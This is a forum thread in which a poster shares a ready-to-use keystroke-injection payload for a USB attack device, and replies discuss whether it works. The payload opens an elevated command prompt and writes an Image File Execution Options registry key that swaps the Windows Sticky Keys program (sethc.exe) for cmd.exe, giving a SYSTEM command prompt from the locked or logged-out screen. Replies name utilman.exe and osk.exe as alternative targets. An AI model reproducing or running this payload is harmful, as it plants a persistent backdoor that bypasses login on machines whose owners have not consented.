crackruckles Posted September 19, 2013 Share Posted September 19, 2013 DISCLAIMER First off i have posted this on github but i thought ide add it here as well as this is version 2. This command prompt will close automatically due to the way this hack works (after about 3 minutes or so) This hack does require pre work and does require administrator privileges to modify the registry and i am assuming that UAC is turned on. Pre workDELAY 400 ESCAPE DELAY 200 CONTROL ESCAPE DELAY 750 STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f" DELAY 750 CTRL-SHIFT ENTER DELAY 1000 ALT y Left Alt + Left Shift + Print Screen to access the system prompt from anywhere on the machine including when the machine is logged out or locked. Have fun guys. Quote Link to comment Share on other sites More sharing options...
parkour86 Posted September 19, 2013 Share Posted September 19, 2013 Thanks for sharing this payload it works perfectly. Is this payload permanent or can I just delete the sethc.exe folder in the registry without messing anything up? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 19, 2013 Share Posted September 19, 2013 I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also ran as SYSTEM on any windows machine, so would also work. Quote Link to comment Share on other sites More sharing options...
crackruckles Posted September 20, 2013 Author Share Posted September 20, 2013 Thanks for sharing this payload it works perfectly. Is this payload permanent or can I just delete the sethc.exe folder in the registry without messing anything up? you can just delete it and it will be back to normal. I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also ran as SYSTEM on any windows machine, so would also work. yeah you can use any of them but i prefer sethc as its nice and hidden and it has quite a long time out period. Quote Link to comment Share on other sites More sharing options...
mr.dude5660 Posted May 27, 2014 Share Posted May 27, 2014 (edited) @crackruckles, I have tried this on a number of computers running win7 and whenever I hit left at+left shift+prtscn I get high contrast mode.. I used the exact script you've posted. Any ideas?? Edited May 27, 2014 by mr.dude5660 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.